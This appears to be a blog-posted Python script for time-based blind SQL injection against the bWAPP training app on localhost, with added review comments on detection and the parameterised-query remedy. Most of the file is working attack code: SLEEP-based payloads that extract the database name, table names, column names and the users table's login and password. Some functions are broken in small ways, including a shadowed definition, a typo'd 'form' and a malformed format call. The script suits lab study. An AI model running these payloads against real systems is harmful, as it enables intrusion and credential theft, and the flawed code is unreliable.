sql注入----sql injection script
2022/7/12 2:20:08
# Time-based blind SQL injection walkthrough against the bWAPP training app
# (sqli_15.php on localhost, see BASE_URL). Every probe is a GET whose `title`
# parameter carries a boolean condition joined to SLEEP(2); the only oracle is
# wall-clock time — a response slower than 2 s is read as "condition true".
# Detection note: the traffic shape is a long serial stream of GETs to a single
# endpoint, each taking >= 2 s, with SLEEP( / information_schema in the query
# string. The server-side remedy is parameterised queries, not input filtering.
import requests
import time
import yaml

# NOTE(review): a live PHPSESSID is committed in source — treat it as a secret.
# security_level=0 selects bWAPP's lowest (unfiltered) level for that session.
HEADER={
    "cookie":"PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0"
}
BASE_URL='http://localhost/bWAPP/app/sqli_15.php'
config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml"
# Read the test.yaml file: BLINDSQL.SQL1 is the SQL fragment consumed by the
# first get_table_count below.
# NOTE(review): yaml.load() without an explicit Loader. On PyYAML >= 5.1 this
# raises TypeError; on older versions it is the full loader, which can
# instantiate arbitrary Python objects from the file — yaml.safe_load() is
# the safe call for a plain config file.
with open(config_path, "r") as file:
    data = yaml.load(file.read())
student1 = data["BLINDSQL"]["SQL1"]
#print(student1)


def get_database_name_length(a,b)->int:
    """Generic length probe.

    `a` is the base URL (a trailing '?' is appended when missing) and `b` a
    query-string template with one `{}` slot for the candidate length. Tries
    1..99 in order and returns the first candidate whose request took longer
    than 2 s; returns 0 when no request was slow. Prints every URL it sends.
    """
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    if a[-1]!="?":
        a=a+"?"
    for i in range(1,100):
        url=a+b.format(i)
        start_time = time.time()
        print(url)
        requests.get(url,headers=HEADER)
        # Timing oracle: the injected SLEEP fires only when the condition holds.
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count


# Blind-infer the length of the current database name
def get_database_name()->int:
    """Return LENGTH(DATABASE()) as inferred from the timing oracle.

    Same loop as get_database_name_length but with the template fixed to
    BASE_URL and SLEEP(2). Candidates 1..99; returns 0 if none was slow.
    """
    count=0
    #title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:
            print("盲注数据库名长度为{}".format(i))
            count = i
            return count
    return count


# Blind-infer the current database name, one character at a time
def get_database_table(count):
    """Recover `count` characters of DATABASE() via ord(mid(DATABASE(), i, 1)).

    For each position 1..count it tries character codes 33..126 and keeps the
    first one whose request exceeded 2 s (up to 94 requests per character).
    Prints the accumulated name; returns None.
    """
    #mmp=get_database_name()
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                print("盲注数据库名长度为{}".chr(m))
                break
    print("打印数据库名称"+x)


# Number of tables under the current database
def get_table_count()->int:
    """Compare the YAML-supplied expression `student1` against 1..99.

    The expression text itself comes from the config file, so what is counted
    depends on that file. Stops at the first slow response and returns it.
    NOTE: a second `get_table_count` is defined further down in this file and
    replaces this one at import time.
    """
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search"
        start_time=time.time()
        requests.get(url,headers=HEADER)
        if time.time()-start_time>2:
            count =i
            print("打印当前数据库下面表数量{}"+str(count))
            break
    return count


# Length of each table name in the database
def get_table_counts(counts)->int:
    """For table rows 0..counts, find each table-name length and dump the name.

    The length m is searched over 1..99 against
    (select length(table_name) ... limit i,1); on the first slow response
    get_database_tabless(i, m) is called to read that name. Returns the last
    value of m that the loop reached.
    """
    for i in range(counts + 1):
        for m in range(1,100):
            url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={}" \
                " and sleep(2) -- &action=search".format(i,m)
            start_time=time.time()
            requests.get(url,headers=HEADER)
            if time.time()-start_time>2:
                print("打印当前表名长度{}".format(m))
                get_database_tabless(i, m)
                break
    return m


# All table names of the database
def get_database_tabless(index,count):
    """Read `count` characters of the table name at row `index`.

    Each position 1..count is resolved by testing ascii(substr(...)) against
    codes 33..126 and keeping the first slow one. Prints the assembled name;
    `x` is cleared before the return, so the return value is always "".
    """
    x=""
    for i in range(1,count+1):
        for m in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
                "ascii(substr((select table_name from information_schema.tables " \
                "where table_schema=database() limit {},1),{},1))={}" \
                " and sleep(2) -- &action=search".format(index,i,m)
            # The parenthesised subselect picks one table name (row `index`);
            # substr('str',1,1) then tests what the i-th character of it is.
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                x=x+chr(m)
                break
    print("打印数据库名称{}" + x)
    x=""
    return x


# From the printed results, the next thing needed is the total column count
# of the users table
def get_table_count()->int:
    """Return the number of columns of table `users` (1..99), or 0.

    Shadows the earlier get_table_count of the same name.
    """
    count=0
    #select count(column_name) from information_schema.columns where table_name='users'
    # — counts how many columns the users table has
    for i in range(1,100):
        url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \
            "AND SLEEP(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url,headers=HEADER)
        if time.time() - start_time > 2:
            print("盲注数据库中users表列数量为:{}".format(i))
            count = i
            return count
    return count


# Length of each column name in the users table
def get_table_nameNumber(count):
    """For column rows 0..count, find each column-name length j in 0..99.

    On the first slow response get_column_name_of(i, j) is called, then the
    length is printed. Returns None.
    """
    for i in range(count+1):
        for j in range(100):
            url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \
                "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                get_column_name_of(i,j)
                print("user表,字段长度为{}".format(j))
                break


# Name of each column
def get_column_name_of(index,count):
    """Print, one per line, the characters 0..count of a column name.

    Each character is resolved over codes 33..126 with the same timing
    oracle; nothing is accumulated or returned.
    """
    for i in range(count+1):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND " \
                "ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \
                "AND SLEEP(2) -- &action=search".format(index,i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                print(chr(j))
                break


# The wanted columns: username and password
def get_username_password():
    """Read positions 0..99 of concat(login, ',', password) of the first users row.

    Every position is resolved over codes 33..126 (first slow response wins);
    the assembled string is printed once at the end. Returns None.
    """
    values=""
    for i in range(100):
        for j in range(33,127):
            url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \
                "AND SLEEP(2) -- &action=search".format(i,j)
            start_time = time.time()
            requests.get(url, headers=HEADER)
            if time.time() - start_time > 2:
                values=values+chr(j)
                break
    print(values)
    values=""


# Note: blind injection generally uses AND
if __name__=='__main__':
    # Only the last step is active; the earlier steps are left commented out.
    #get_table_counts(get_table_count())
    #get_database_table(get_database_name())
    #get_table_counts(get_table_count())
    #get_table_count()
    #get_table_count()# print the total column count of the users table
    get_username_password()# print the wanted output
# userAgent: the browser's request requirements; this gets past only the most
# basic checks; a single quote is used to test for SQL injection